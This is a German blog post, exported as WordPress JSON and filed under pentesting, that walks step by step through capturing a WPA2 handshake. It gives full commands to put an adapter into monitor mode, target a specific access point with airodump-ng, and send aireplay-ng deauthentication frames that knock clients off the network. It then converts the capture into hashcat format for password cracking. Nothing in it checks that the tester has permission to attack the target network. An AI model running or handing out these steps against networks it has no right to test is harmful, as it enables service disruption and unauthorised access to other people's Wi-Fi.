{"id":498,"date":"2020-11-19T09:30:06","date_gmt":"2020-11-19T08:30:06","guid":{"rendered":"http:\/\/blog.r00x.at\/?p=498"},"modified":"2020-11-26T15:23:41","modified_gmt":"2020-11-26T14:23:41","slug":"wpa2-handshake-aufzeichnen","status":"publish","type":"post","link":"https:\/\/blog.r00x.at\/?p=498","title":{"rendered":"WPA2 Handshake aufzeichnen"},"content":{"rendered":"\n

Erstmal ben\u00f6tigt man eine WLAN-Karte \/ Adapter welche in der Lage ist in den sogenannten Monitormode<\/strong> versetzt zu werden. Ich habe den Alfa Network AWUS036NHA<\/a>. <\/p>\n\n\n\n

Man ben\u00f6tigt ein Linux. In meinem Fall entscheide ich mich eigentlich immer f\u00fcr Linux Mint<\/a>. F\u00fcr diese Anleitung ben\u00f6tigt man ein Linux, welches apt<\/strong> als Paketmanager nutzt. Grunds\u00e4tzlich kann man alle Schritte auch auf einem RPi mit Raspbian machen.<\/p>\n\n\n\n

Als erstes werden alle ben\u00f6tigten Pakete installiert.<\/p>\n\n\n\n

sudo apt update\nsudo apt upgrade\n\nsudo apt-get install python-dev build-essential libssl-dev libffi-dev libxml2-dev libxslt1-dev zlib1g-dev\nsudo apt-get install python3 python-dev python3-dev build-essential libssl-dev libffi-dev libxml2-dev libxslt1-dev zlib1g-dev\n\nsudo apt install git\nsudo apt install wifite\nsudo apt install aircrack-ng\n<\/pre>\n\n\n\n
Ich gehe nicht auf die Treiberinstallation bzw. das Funktionieren der WLAN-Karte ein. Meine ist soweit kompatibel, dass ich den Adapter anstecke und er wird „on-the-fly“ erkannt und funktioniert. Egal ob PC oder RPi.<\/p>\n\n\n\n
Nach der Installation starte ich gerne mal „wifite<\/strong>„. Ein Tool, welches „automatisch“ ein WLAN pentesten kann.
In meinem Fall starte ich wifite deshalb, weil es m\u00f6gliche „konflikt“ Programme schlie\u00dft und die WLAN-Karte in den Monitormode versetzt.<\/p>\n\n\n\n
sudo wifite --kill\n<\/pre>\n\n\n\n
\"\"<\/a><\/figure>\n\n\n\n
Auf dem Bild sieht man, dass die Karte mit der Bezeichnung: wlx00c0ca978743<\/strong> in den Monitormode gebracht wird und danach „wlan0mon<\/strong>“ hei\u00dft. Das Programm beginnt sofort die verf\u00fcgbaren WLAN-Netzwerke zu „scannen“. Um mit wifite einen Angriff zu starten ben\u00f6tigt man alle im Bild aufgef\u00fchrten Pakete. Also wenn man wifite verwenden will, einfach den angef\u00fchrten Links zur installation folgen. Die Anleitungen sind sehr \u00fcbersichtlich und es sollte kein Problem sein alle Pakete zu installieren.<\/p>\n\n\n\n
Um zu pr\u00fcfen wie die WLAN-Karte nun hei\u00dft gibt man folgendes ein.<\/p>\n\n\n\n
iwconfig<\/pre>\n\n\n\n
\"\"<\/a><\/figure>\n\n\n\n
Im Bild sieht man, die Karte wird nun mit wlan0mon angesprochen (wifite regelt)<\/p>\n\n\n\n
Nun werden die verf\u00fcgbaren Netzte gescannt<\/p>\n\n\n\n
sudo airodump-ng wlan0mon<\/pre>\n\n\n\n
\"\"<\/a><\/figure>\n\n\n\n
Eine nette Liste erscheint mit allen verf\u00fcgbaren Netzwerken. Im oberen Teil sieht man die MAC Adressen (BSSID<\/strong>) und den zugeh\u00f6rigen Namen (ESSID<\/strong>) zum jeweiligen Access Point. Im unteren Teil sieht man Clients welche zu einem Access Point verbunden sind. Bei PWR sieht man die Leistung. Sollte diese zu gering sein lohnt sich ein Angriff nicht. Um einen erfolgreichen Angriff zu starten muss ein Client mit einem Router verbunden sein.<\/p>\n\n\n\n
Also w\u00e4hlt man ein Ziel aus, tr\u00e4gt alle Parameter ein (Channel, BSSID, Filename) und startet die Aufzeichnung der Daten.<\/p>\n\n\n\n
sudo airodump-ng wlan0mon -c 1 --bssid 04:02:1F:F5:1F:28 -w 3WebCube1F27\n<\/pre>\n\n\n\n
\"\"<\/a><\/figure>\n\n\n\n
Nun ben\u00f6tigt man eine zweite Console um zumindest einen verbunden Client zu zwingen sich neu zu verbinden, damit man einen Handshake bekommt.<\/p>\n\n\n\n
sudo aireplay-ng wlan0mon --deauth 1 -a 04:02:1F:F5:1F:28  -c 68:E7:C2:3F:42:DD\nsudo aireplay-ng wlan0mon --deauth 1 -a 04:02:1F:F5:1F:28  -c E8:4E:06:51:09:70\nsudo aireplay-ng wlan0mon --deauth 3 -a 04:02:1F:F5:1F:28 \n<\/pre>\n\n\n\n
Bei den ersten Befehlen wird gezielt versucht das verbundene Ger\u00e4t zum reconnecten zu bewegen. Beim dritten Befehl wird auf gut Gl\u00fcck ein deauth probiert. Dies ben\u00f6tigt man, wenn man keine Clients sieht, da diese m\u00f6glicherweise zu weit weg sind. 
Eventuell ist es n\u00f6tig diese Befehle mehrfach auszuf\u00fchren und auch bei neuen Clients die Befehle zu erweitern. (Anm.: Bild vom „airplay-ng deauth“ fehlt)<\/p>\n\n\n\n
\"\"<\/a><\/figure>\n\n\n\n
Ist der Versuch gegl\u00fcckt, wird rechts oben ein WPA handshake<\/strong> angezeigt. Ist dies der Fall, kann man die airodump-ng aufzeichnung beenden.<\/p>\n\n\n\n
Nun haben wir im Ordner 5 Dateien (*.csv, *.kismet.csv, *kismet.netxml, *.log.csv und *.cap) von airodump-ng generiert. Uns interessiert nur die *.cap<\/strong> File. In meinem Fall „3WebCube1F27-01.cap<\/strong>„.<\/p>\n\n\n\n
Nun extrahieren wir den WPA handshake<\/strong> und bringen diesen in ein „hashcat<\/a><\/strong>“ kompatibles Format.<\/p>\n\n\n\n
git clon https:\/\/github.com\/hashcat\/hashcat-utils\ncd hashcat-utils\ncd src\nmake\nsudo cp cap2hccapx.bin \/usr\/bin\/cap2hccapx\ncd \/home\/USERNAME\/\ncap2hccapx 3WebCube1F27-01.cap 3WebCube1F27-01.hccapx\n<\/pre>\n\n\n\n
Die neue Datei „3WebCube1F27-01.hccapx<\/span><\/strong>“ wurde erstellt und kann nun zum Passwort knacken weiter verwendet werden.<\/p>\n\n\n\n
Zum cracken des Handshakes geht es hier weiter —><\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
Erstmal ben\u00f6tigt man eine WLAN-Karte \/ Adapter welche in der Lage ist in den sogenannten Monitormode versetzt zu werden. Ich habe den Alfa Network AWUS036NHA. Man ben\u00f6tigt ein Linux. In meinem Fall entscheide ich mich …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[9],"tags":[],"class_list":["post-498","post","type-post","status-publish","format-standard","hentry","category-pentest"],"_links":{"self":[{"href":"https:\/\/blog.r00x.at\/index.php?rest_route=\/wp\/v2\/posts\/498","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.r00x.at\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.r00x.at\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.r00x.at\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.r00x.at\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=498"}],"version-history":[{"count":11,"href":"https:\/\/blog.r00x.at\/index.php?rest_route=\/wp\/v2\/posts\/498\/revisions"}],"predecessor-version":[{"id":561,"href":"https:\/\/blog.r00x.at\/index.php?rest_route=\/wp\/v2\/posts\/498\/revisions\/561"}],"wp:attachment":[{"href":"https:\/\/blog.r00x.at\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=498"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.r00x.at\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=498"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.r00x.at\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=498"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}